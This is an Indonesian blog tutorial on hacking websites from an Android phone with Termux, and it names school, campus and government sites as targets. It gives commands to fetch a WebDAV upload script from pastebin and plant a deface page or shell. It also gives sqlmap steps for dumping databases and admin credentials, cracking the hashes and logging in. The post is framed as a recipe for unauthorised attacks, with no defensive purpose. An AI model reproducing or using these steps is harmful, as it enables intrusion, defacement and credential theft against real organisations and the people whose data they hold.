Cara Hack Website Dengan Termux

Kalo ngomongin hack website menggunakan termux ada banyak sekali yang bisa kita lakukan menggunakan aplikasi termux ini.

termux merupakan aplikasi emulator yang hampir mirip layaknya sistem operasi linux lainya seperti kali linux, centos fedora dll.

hampir semua program di linux bisa di jalankan menggunakan aplikasi termux ini, bahkan kita bisa menginstall os kali linux di dalam aplikasi termux kita perintahnya pun hampir mirim seperti os termux yang lain yang penting bukan perintah cmd ya, sehingga kita bisa menjalankan tools kali di android.

di postingan kali ini kita akan ngomongin hack website di termux nih menggunakan perangkat android kita.

kalo bicara hack website di termux kebanyakan teknik hacking bisa di jalankan menggunakan aplikasi termux asalkan ada tool hackingnya.

ada banyak tool yang bisa kita manfaatkan kalo hanya untuk sekedar memasukin website orang lain, misal sql map, Setoolkit, Webdav, red hawk, dan masih banyak lagi saya juga sudah beberapa kali membahas tool termux, kalian bisa mempelajarinya dengan membaca – baca postingan saya di web ini.

maka dari itu sekarang kita tentukan teknik hackingnya terlebih dahulu yang ingin kita lakukan.

di sini kita akan menggunakan 2 teknik hacking yang akan kita lakukan di android kita, yang pertama yaitu metode webdav dan SQL Injection

2 teknik hacking di atas merpakan teknik yang cukup populer yang bisa kalian gunakan untuk meretas berbagai macam website seperti web sekolah atau kampus, web pemerintah ataupun web toko online asalkan jangan web togel yaa.

hack web site apapun sebenarnya tidak ada bedanya, yang membedakan hayalah fungsi, cms dan domain web tersebut. kalo kalian emang sengaja menargetkan web sekolah biasanya web sekolah menggunakan cms balitbang dan webdav.

bailah langsung saja kita masuk ke tutorialnya.

Cara Hack Website Sekolah dengan Termux teknik Webdav

untuk awal kita akan menggunakan teknik yang paling gampang dulu nih, buat kalian yang masih pemula saya yakin kalian juga bisa mempraktekanya.

kita akan menggunakan teknik webdav dan website tujuan kita yaitu website sekolah atau web yang berdomain .sch,id. enatah kenapa sekarang pelajar pada pengen ngerti cara hack website sekolah entah apa tujuanya,

mungkin buat nyerang sekolah musuhnya kali ya? pantes aja anak it jarang tawuran, orang tawuranya lewat online ckckck, baiklah langsung saja kita masuk ke tutorialnya.

oke di sini saya anggap kalian sudah menginstall aplikasi termuxnya, kalo belum kalian bisa download di google play Termux

Jangan lupa juga untuk menyiapkan script deface kalian, kalo kalian belum punya kalian bisa Download di Kumpulan Script Deface Keren

Pertama kalian buka aplikasi termuxnya, kemudian jalankan semua perintah termux di bawah dengan urut.

$cd /storege/emulate/0 $apt install wget
$apt install python
$apt install libcurl
$apt install openssl curl $pip2 install urllib3
$pip2 install utllib3 chardet certifi idna requests
$mkdir webdav
$cd webdav
$wget https://pastebin.com/raw/HnVyQPtR -O webdav.py

jika kalian sudah menjalankan semua perintah di atas, kalian cari script deface kalian lalu ubah namanya menjadi index.html

website di android termux

selanjutnya pindah script deface itu ke folder webdav yang ada di penyimpanan internal atau penyimpanan telephone.

jika sudah, kembali lagi ke aplikasi termux kalian, lalu masuk ke folder webdav menggunakan perintah

$cd /sdcard/webdav

kemudian jalankan tool webdavnya sekaligus menyisipkan shell atau script deface kalian, gunakan perintah

$python2 webdav.py web_target index.html

Note : web_target isikan dengan url web vuln yang sudah kalian dapatkan atau incar

cara deface di android termux

index.html adalah nama shell atau script deface kalian, itulah kenapa di awal saya anjurkan untuk merubah nama, jika sudah kalian jalankan perintahnya lalu kalo ada tulisan [Y/n] ketik saja y kemudian enter.

deface website di android tanpa aplikasi

Terkait : Cara Mencari Web Vuln Webdav

dan sekarang kita sudah bisa hack website yang sudah kita tuju, untuk mengeceknya kalian bia cek websitenya mlalui browser kalian.

Gimana? gampang kan.

Gak Work?

kalo cara ini gak work atau tidak berhasil itu kemungkinan kalian salah mengetikan perintah, mungkin penulisan url salah atau nama shell maupn script defacenya.

dan kemungkinan ke dua yaitu web yang kalian tuju tidak vuln atau rentan, kalo keamanan di dalam website yang kalian targetkan cukup kuat mungkin cara ini tidak berhasil.

tapi jangan khawatir karena kita masih punya cara yang ke dua yaitu menggunakan SQL Injection di android. simak tutorial berikut ini.

Cara Hack Website Dengan Termux di Android SQL Injection

Cara yang ke dua, kita akan menggunakan teknik sql injection untuk hack website di android, oleh karena itu kalian harus menginstall tool untuk menjalankan sql injection di termux.

tool nya adalah sqlmap, saya tidak akan menuliskan tutorial cara install sqlmap di termux karena saya sudah pernah menulisnya di postingan sebelumnya, bagi kalian yang belum menginstall sqlmap di termux silahkan kalian baca : Cara Install SQL Map di Termux Android

Oke. sampai di sini saya anggap kalian sudah menginstall sqlmap di termux kalian.

pertama kalian sediakan web vuln kalian, kalian bisa mencari web vuln mengguakan gr3nox maupun google dork.

selanjutnya kalian jalankan perintah di bawah

$ python2 sqlmap.py --url (target web vuln) --dbs

Note : ganti (target web vuln) dengan website yang kailan targetkan

setelah kalian menjalankan perintah di atas nanti kita akan mendapatkan isi database dari website tersebut

tunggu hingga proses inject berjalan lalu nanti akan keluar databasenya, contohnya seperti di bawah.

setelah itu kita akan menlihat isi dari database di atas untuk mendapatkan informasi table.

saya akan mengexploitasi isi dari dari database antkhproject, jadi saya akan memasukan perintah

$ python2 sqlmap.py --url (target web vuln) --dbs (database yang sudah di dapat) --tables

contohnya seperti ini :

$python2 sqlmap.py –url http://www.antkh.com/project/kfour/Products.php?CatID=12 –dbs antkhproject –tables

sekarang kita akan mencari table yang menyimpan informasi admin atau user, lalu get colloumns

$ python2 sqlmap.py --url (target web vuln) --dbs (database yang sudah di dapat) --tables (nama tabel) --columns

nanti kalian akan melihat banyak sekali kolom, kita hanya akan memilih kolom yang kemungkinan ada user dan password, kemudian kita akan dumping datanya menggunakan perintah.

$ python2 sqlmap.py --url (target web vuln) --dbs (database yang sudah di dapat) --tables (nama tabel) --columns (nama colom)--dump

sampai di sini kita sudah mendapatkan user dan password admin di website yang kita targetkan, kalo password yang kalian dapatkan tidak bisa di baca atau masih dalam keadaan terencrypt, kalian bisa gunakan tool online yang bernama hash decoder untuk mengubah hash tersebut agar bisa di baca.

lalu setalah ini apa yang akan kita lakukan dengan username dan dan password yang sudah kita dapatkan?

Ya Login lahh..

kalian bisa mencari admin login nya menggunakan Admin Login Finder agar kalian bisa login ke dalam web tersebut.

Ribet yah?

ya memang begitu tapi cara ini lah yang kemungkinan berhasilnya cukup besar, kalo kalian ada yang error atau masalah bisa sampaikan di kolom komentar.

baiklah sekian dulu tutorial Cara Hack Website Dengan Termux semoga postingan ini bermanfaat dan sampai jumpa di postingan berikutnya.

Leave a Comment